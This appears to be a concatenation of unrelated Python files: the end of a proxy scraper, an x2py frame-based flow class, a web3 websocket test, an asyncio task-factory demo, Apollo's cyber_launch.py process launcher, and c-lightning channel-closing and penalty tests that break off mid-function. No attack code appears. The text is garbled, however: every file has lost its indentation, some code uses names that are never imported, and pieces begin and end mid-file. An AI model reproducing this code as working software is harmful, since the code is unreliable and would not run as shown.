print "Could not scrape any proxies!"
raw_input("\nPress any key to exit...")
sys.exit()
print "Finish!"
|
frame_based_flow.py
|
# Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
import sys
import time
from threading import Lock, Thread
from x2py.event import Event
from x2py.event_queue import EventQueue
from x2py.flow import Flow
from x2py.util.atomic import AtomicInt
from x2py.util.trace import Trace
class Time(object):
"""Utility class to handle time information within a frame-based flow."""
# time.clock was deprected in 3.3 and removed in 3.8
if sys.version_info >= (3, 3):
clock = time.perf_counter
else:
clock = time.clock
def __init__(self):
pass
def init(self):
self.start_clock = Time.clock()
self.last_clock = self.start_clock
self.current_clock = self.last_clock
self.delta_clock = 0.0
def before_update(self):
self.current_clock = Time.clock()
self.delta_clock = self.current_clock - self.last_clock
def after_update(self):
self.last_clock = self.current_clock
class FrameBasedFlow(Flow):
"""Abstract base class for frame-based (looping) execution flows."""
def __init__(self, name=None, with_queue=False):
super(FrameBasedFlow, self).__init__(name)
self.queue = None
if with_queue:
self.queue = EventQueue()
self._lock = Lock()
self.should_stop = AtomicInt()
self.thread = None
# Default resolution is 15.625ms (64 frame/sec)
self.resolution = 0.015625
self.time = Time()
def feed(self, event):
if self.queue is None:
return
if event is None or not isinstance(event, Event):
raise TypeError()
self.queue.enqueue(event)
def start(self):
with self._lock:
if self.thread is not None:
return
self._setup()
self.cases.setup_with(self)
self.thread = Thread(target=self)
if self.name is not None:
self.thread.setName(self.name)
self.thread.start()
if self.queue is not None:
self.queue.enqueue(FlowStart())
def stop(self):
with self._lock:
if self.thread is None:
return
self.should_stop.value = 1
if self.queue is not None:
self.queue.close(FlowStop())
self.thread.join()
self.thread = None
self.cases.teardown_with(self)
self._teardown()
def __call__(self):
Flow.thread_local.current = self
if self.queue is not None:
Flow.thread_local.event_proxy = EventProxy()
Flow.thread_local.handler_chain = []
self._begin()
while self.should_stop.value == 0:
self._update()
if self.queue is not None:
while (Time.clock() - self.time.current_clock) < self.resolution:
event = self.queue.try_dequeue()
if event is not None:
self.dispatch(event)
if event.type_id() == BuiltinEventType.FLOW_STOP:
self.should_stop.value = 1
break
else:
if self.should_stop.value != 0:
break
else:
time.sleep(0.001)
continue
else:
clock_delta = Time.clock() - self.time.current_clock
if clock_delta < self.resolution:
delay = self.resolution - clock_delta
else:
delay = 0.0
time.sleep(delay)
self.end()
if self.queue is not None:
Flow.thread_local.handler_chain = None
Flow.thread_local.event_proxy = None
Flow.thread_local.current = None
def _begin(self):
self.time.init()
self.begin()
def _update(self):
self.time.before_update()
self.update()
self.time.after_update()
def begin(self):
pass
def end(self):
pass
def update(self):
raise NotImplementedError()
|
test_websocket_provider.py
|
import asyncio
from concurrent.futures import (
TimeoutError,
)
import pytest
from threading import (
Thread,
)
import websockets
from tests.utils import (
wait_for_ws,
)
from web3 import Web3
from web3.exceptions import (
ValidationError,
)
from web3.providers.websocket import (
WebsocketProvider,
)
@pytest.yield_fixture
def start_websocket_server(open_port):
event_loop = asyncio.new_event_loop()
def run_server():
async def empty_server(websocket, path):
data = await websocket.recv()
await asyncio.sleep(0.02)
await websocket.send(data)
server = websockets.serve(empty_server, '127.0.0.1', open_port, loop=event_loop)
event_loop.run_until_complete(server)
event_loop.run_forever()
thd = Thread(target=run_server)
thd.start()
try:
yield
finally:
event_loop.call_soon_threadsafe(event_loop.stop)
@pytest.fixture()
def w3(open_port, start_websocket_server):
# need new event loop as the one used by server is already running
event_loop = asyncio.new_event_loop()
endpoint_uri = 'ws://127.0.0.1:{}'.format(open_port)
event_loop.run_until_complete(wait_for_ws(endpoint_uri, event_loop))
provider = WebsocketProvider(endpoint_uri, websocket_timeout=0.01)
return Web3(provider)
def test_websocket_provider_timeout(w3):
with pytest.raises(TimeoutError):
w3.vns.accounts
def test_restricted_websocket_kwargs():
invalid_kwargs = {'uri': 'ws://127.0.0.1:8546'}
re_exc_message = r'.*found: {0}*'.format(set(invalid_kwargs.keys()))
with pytest.raises(ValidationError, match=re_exc_message):
WebsocketProvider(websocket_kwargs=invalid_kwargs)
|
custom_loop.py
|
import asyncio
import logging
# Logging setup
import threading
import time
from concurrent.futures import ThreadPoolExecutor
class AsyncioLoggingFilter(logging.Filter):
def filter(self, record):
task = asyncio.Task.current_task()
record.task = f'[task {id(task)}]' if task else '[NOLOOP ]'
return True
logger = logging.getLogger(__name__)
logger.addFilter(AsyncioLoggingFilter())
logging.getLogger('asyncio').setLevel(logging.CRITICAL)
logging.basicConfig(level=logging.INFO, format="%(msecs)f %(threadName)s %(task)s %(msg)s")
class ThreadSerializedTask(asyncio.Task):
_lock = threading.Lock()
def _wakeup(self, *args, **kwargs):
logger.debug("Acquire lock")
ThreadSerializedTask._lock.acquire()
super()._wakeup(*args, **kwargs)
logger.debug("Releasing lock")
ThreadSerializedTask._lock.release()
def task_factory(loop, coro):
return ThreadSerializedTask(coro, loop=loop)
async def one():
await asyncio.sleep(0.01)
logger.debug("-> One")
await two()
await asyncio.sleep(0.01)
logger.debug("-> Exiting one")
async def two():
await asyncio.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
def run_loop():
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
loop.run_until_complete(one())
if __name__ == '__main__':
threads = []
for _ in range(0, 5):
thread = threading.Thread(target=run_loop)
thread.start()
threads.append(thread)
[t.join() for t in threads]
|
cyber_launch.py
|
#!/usr/bin/env python3
# ****************************************************************************
# Copyright 2018 The Apollo Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
import argparse
import atexit
import logging
import os
import os.path
import signal
import subprocess
import sys
import time
import threading
import traceback
import xml.etree.ElementTree as ET
g_binary_name = 'mainboard'
g_pwd = os.getcwd()
g_script_name = os.path.basename(sys.argv[0]).split(".")[0]
g_process_pid = os.getpid()
g_process_name = g_script_name + "_" + str(g_process_pid)
cyber_path = os.getenv('CYBER_PATH')
"""
colorful logging
"""
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
COLORS = {
'INFO': GREEN,
'WARNING': YELLOW,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': YELLOW
}
class ColoredFormatter(logging.Formatter):
def __init__(self, msg):
logging.Formatter.__init__(self, msg)
def format(self, record):
levelname = record.levelname
if levelname in COLORS:
if levelname == 'DEBUG':
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[0] + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[-1] + RESET_SEQ
else:
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
g_process_name + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + \
" " + record.msg.split('#')[-1] + RESET_SEQ
return logging.Formatter.format(self, record)
color_formatter = ColoredFormatter("[%(levelname)-18s] %(message)s")
console = logging.StreamHandler()
console.setFormatter(color_formatter)
logger = logging.Logger(__name__)
logger.addHandler(console)
def exit_handler():
stop()
os.chdir(g_pwd)
logger.info('cyber_launch exit.')
atexit.register(exit_handler)
def singleton(cls):
instances = {}
def getinstance(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return getinstance
def module_monitor(mod):
while True:
line = mod.popen.stdout.readline()
if line:
logger.debug('%s# %s' % (mod.name, line.decode('utf8').strip('\n')))
continue
time.sleep(0.01)
class ProcessWrapper(object):
def __init__(self, binary_path, dag_num, dag_list, process_name,
process_type, sched_name, exception_handler=''):
self.time_of_death = None
self.started = False
self.binary_path = binary_path
self.dag_num = dag_num
self.dag_list = dag_list
self.name = process_name
self.sched_name = sched_name
self.process_type = process_type
self.popen = None
self.exit_code = None
self.args = []
self.pid = -1
self.exception_handler = exception_handler
def wait(self):
if self.started:
self.popen.wait()
def start(self):
"""
Start a manager in process name
"""
if self.process_type == 'binary':
args_list = self.name.split()
else:
args_list = [self.binary_path]
for i in self.dag_list:
args_list.append('-d')
args_list.append(i)
if len(self.name) != 0:
args_list.append('-p')
args_list.append(self.name)
if len(self.sched_name) != 0:
args_list.append('-s')
args_list.append(self.sched_name)
self.args = args_list
try:
self.popen = subprocess.Popen(args_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except Exception as err:
logger.error('Subprocess Popen exception: ' + str(err))
return 2
else:
if self.popen.pid == 0 or self.popen.returncode is not None:
logger.error('Start process [%s] failed.' % self.name)
return 2
th = threading.Thread(target=module_monitor, args=(self, ))
th.setDaemon(True)
th.start()
self.started = True
self.pid = self.popen.pid
logger.info('Start process [%s] successfully. pid: %d' %
(self.name, self.popen.pid))
logger.info('-' * 120)
return 0
def is_alive(self):
"""
Check the process if is still running
@return: True if process is still running
@rtype: bool
"""
if not self.started:
return False
if self.popen is None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
self.exit_code = self.popen.poll()
if self.exit_code is not None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
return True
def get_exit_state(self):
"""
@return: description of exit state
@rtype: str
"""
if self.popen.returncode is None:
pass
elif self.popen.returncode != 0:
output = 'Process [%s] has died [pid %s, exit code %s, cmd %s].' % \
(self.name, self.pid, self.exit_code, ' '.join(self.args))
logger.error(output)
else:
output = 'Process [%s] has finished. [pid %s, cmd %s].' % \
(self.name, self.pid, ' '.join(self.args))
logger.error(output)
@singleton
class ProcessMonitor(object):
def __init__(self):
self.procs = []
self.dead_cnt = 0
self.done = False
self.is_shutdown = False
def register(self, p):
"""
Register process with L{ProcessMonitor}
@param p: Process
@type p: L{Process}
"""
if self.has_process(p.name):
logger.error(
'Cannot add process due to duplicate name "%s".' % p.name)
elif self.is_shutdown:
logger.error(
'Cannot add process [%s] due to monitor has been stopped.' % p.name)
else:
self.procs.append(p)
def has_process(self, name):
"""
@return: True if process is still be monitored. If False, process
has died or was never registered with process
@rtype: bool
"""
return len([p for p in self.procs if p.name == name]) > 0
def check_cleanup(self):
"""
Check processes are alived, cleanup processes
"""
dead_cnt = 0
for pw in self.procs:
if self.is_shutdown:
break
if pw.process_type == 'binary':
continue
try:
if not pw.is_alive():
if pw.exception_handler == "respawn":
logger.warning(
'child process [%s][%d] exit, respawn!' % (pw.name, pw.pid))
result = pw.start()
if result != 0:
logger.error(
'respawn process [%s] failed, stop all!' % (pw.name))
stop()
elif pw.exception_handler == "exit":
logger.warning(
'child process [%s][%d] exit, stop all' % (pw.name, pw.pid))
stop()
dead_cnt += 1
except Exception:
dead_cnt += 1
traceback.print_exc()
if dead_cnt > 0:
self.dead_cnt = dead_cnt
if self.dead_cnt == len(self.procs):
self.is_shutdown = True
def run(self):
"""
Run processes monitor, until all processes are died.
"""
while not self.is_shutdown:
self.check_cleanup()
time.sleep(0.2)
for p in self.procs:
p.get_exit_state()
if self.dead_cnt == len(self.procs):
logger.info("All processes has died.")
return True
return False
def stop(self, signal):
"""
Stop all processes in monitor
"""
for p in self.procs:
if p.is_alive():
p.popen.send_signal(signal)
for p in self.procs:
if p.is_alive():
logger.warning('Waiting for [%s][%s] exit.' % (p.name, p.pid))
p.wait()
logger.info(
'Process [%s] has been stopped. dag_file: %s' % (p.name, p.dag_list))
# Reset members
self.procs = []
self.dead_cnt = 0
def start(launch_file=''):
"""
Start all modules in xml config
"""
pmon = ProcessMonitor()
# Find launch file
if launch_file[0] == '/':
launch_file = launch_file
elif launch_file == os.path.basename(launch_file):
launch_file = os.path.join(cyber_path, 'launch', launch_file)
else:
if os.path.exists(os.path.join(g_pwd, launch_file)):
launch_file = os.path.join(g_pwd, launch_file)
else:
logger.error('Cannot find launch file: %s ' % launch_file)
sys.exit(1)
logger.info('Launch file [%s]' % launch_file)
logger.info('=' * 120)
if not os.path.isfile(launch_file):
logger.error('Launch xml file %s does not exist' % launch_file)
sys.exit(1)
try:
tree = ET.parse(launch_file)
except Exception:
logger.error('Parse xml failed. illegal xml!')
sys.exit(1)
total_dag_num = 0
dictionary = {}
dag_dict = {}
root1 = tree.getroot()
for module in root1.findall('module'):
process_name = module.find('process_name').text
process_type = module.find('type')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if process_type != 'binary':
dag_list = []
for dag_conf in module.findall('dag_conf'):
if dag_conf.text is None:
continue
dag = dag_conf.text.strip()
if len(dag) > 0:
dag_list.append(dag)
if len(dag_list) == 0:
logger.error('Library dag conf is null')
continue
else:
total_dag_num += len(dag_list)
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
process_name = process_name.strip()
if str(process_name) in dictionary:
dictionary[str(process_name)] += 1
else:
dictionary[str(process_name)] = 1
if str(process_name) not in dag_dict:
dag_dict[str(process_name)] = dag_list
else:
dag_dict[str(process_name)].extend(dag_list)
process_list = []
root = tree.getroot()
for env in root.findall('environment'):
for var in env.getchildren():
os.environ[var.tag] = str(var.text)
for module in root.findall('module'):
module_name = module.find('name').text
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
sched_name = module.find('sched_name')
process_type = module.find('type')
exception_handler = module.find('exception_handler')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if sched_name is None:
sched_name = "CYBER_DEFAULT"
else:
sched_name = sched_name.text
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
dag_list = []
for dag_conf in module.findall('dag_conf'):
if dag_conf.text is None:
continue
dag = dag_conf.text.strip()
if len(dag) > 0:
dag_list.append(dag)
if module_name is None:
module_name = ''
if exception_handler is None:
exception_handler = ''
else:
exception_handler = exception_handler.text
module_name = module_name.strip()
process_name = process_name.strip()
sched_name = sched_name.strip()
exception_handler = exception_handler.strip()
logger.info('Load module [%s] %s: [%s] [%s] conf: [%s] exception_handler: [%s]' %
(module_name, process_type, process_name, sched_name, ', '.join(dag_list),
exception_handler))
if process_name not in process_list:
if process_type == 'binary':
if len(process_name) == 0:
logger.error(
'Start binary failed. Binary process_name is null.')
continue
pw = ProcessWrapper(
process_name.split()[0], 0, [
""], process_name, process_type,
exception_handler)
# Default is library
else:
pw = ProcessWrapper(
g_binary_name, 0, dag_dict[
str(process_name)], process_name,
process_type, sched_name, exception_handler)
result = pw.start()
if result != 0:
logger.error(
'Start manager [%s] failed. Stop all!' % process_name)
stop()
pmon.register(pw)
process_list.append(process_name)
# No module in xml
if not process_list:
logger.error("No module was found in xml config.")
return
all_died = pmon.run()
if not all_died:
logger.info("Stop all processes...")
stop()
logger.info("Cyber exit.")
def stop(sig=signal.SIGINT):
"""
stop all modules
"""
pmon = ProcessMonitor()
if len(pmon.procs) == 0:
return
pmon.stop(sig)
logger.info('All processes have been stopped.')
sys.exit(0)
def stop_launch(launch_file):
"""
Stop the launch file
"""
if not launch_file:
cmd = 'pkill -INT cyber_launch'
else:
cmd = 'pkill -INT -f ' + launch_file
os.system(cmd)
time.sleep(3)
logger.info('Stop cyber launch finished.')
sys.exit(0)
def signal_handler(sig, frame):
logger.info('Keyboard interrupt received. Stop all processes.')
stop(sig)
def main():
"""
Main function
"""
if cyber_path is None:
logger.error(
'Error: environment variable CYBER_PATH not found, set environment first.')
sys.exit(1)
os.chdir(cyber_path)
parser = argparse.ArgumentParser(description='cyber launcher')
subparsers = parser.add_subparsers(help='sub-command help')
start_parser = subparsers.add_parser(
'start', help='launch/benchmark.launch')
start_parser.add_argument('file', nargs='?', action='store',
help='launch file, default is cyber.launch')
stop_parser = subparsers.add_parser(
'stop', help='stop all the module in launch file')
stop_parser.add_argument('file', nargs='?', action='store',
help='launch file, default stop all the launcher')
# restart_parser = subparsers.add_parser('restart', help='restart the module')
# restart_parser.add_argument('file', nargs='?', action='store', help='launch file,
# default is cyber.launch')
params = parser.parse_args(sys.argv[1:])
command = sys.argv[1]
if command == 'start':
start(params.file)
elif command == 'stop':
stop_launch(params.file)
# elif command == 'restart':
# restart(params.file)
else:
logger.error('Invalid command %s' % command)
sys.exit(1)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
main()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-broadcast-interval
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi']
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
l2.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_while_disconnected(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(101)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fund_channel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(not DEVELOPER, "needs dev-rescan-outputs")
def test_closing_torture(node_factory, executor, bitcoind):
l1, l2 = node_factory.get_nodes(2)
amount = 10**6
# Before the fix was applied, 15 would often pass.
# However, increasing the number of tries would
# take longer in VALGRIND mode, triggering a CI
# failure since the test does not print any
# output.
# On my laptop, VALGRIND is about 4x slower than native, hence
# the approximations below:
iterations = 50
if VALGRIND:
iterations //= 4
if SLOW_MACHINE:
iterations //= 2
for i in range(iterations):
# Reduce probability that spurious sendrawtx error will occur
l1.rpc.dev_rescan_outputs()
# Create a channel.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, amount)
scid = l1.get_channel_scid(l2)
# Get it confirmed.
l1.bitcoin.generate_block(6)
# Wait for it to go to CHANNELD_NORMAL
l1.wait_channel_active(scid)
l2.wait_channel_active(scid)
# Start closers: can take a long time under valgrind!
c1 = executor.submit(l1.rpc.close, l2.info['id'], False, 60)
c2 = executor.submit(l2.rpc.close, l1.info['id'], False, 60)
# Wait for close to finish
c1.result(TIMEOUT)
c2.result(TIMEOUT)
wait_for(lambda: len(bitcoind.rpc.getrawmempool(False)) == 1)
# Get close confirmed
l1.bitcoin.generate_block(100)
wait_for(lambda: len(l1.rpc.listpeers()['peers']) == 0)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
@unittest.skipIf(not DEVELOPER, "needs dev-override-feerates")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['address']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels
# All closes occur in parallel, and on Travis,
# ALL those lightningd are running on a single core,
# so increase the timeout so that this test will pass
# when valgrind is enabled.
# (close timeout defaults to 30 as of this writing)
closes = [executor.submit(l1.rpc.close, p.channel, False, 90) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
# This should return with an error, then close.
with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
l1.rpc.close(chan, False, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('UPDATE WIRE_CHANNEL_GOT_COMMITSIG')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
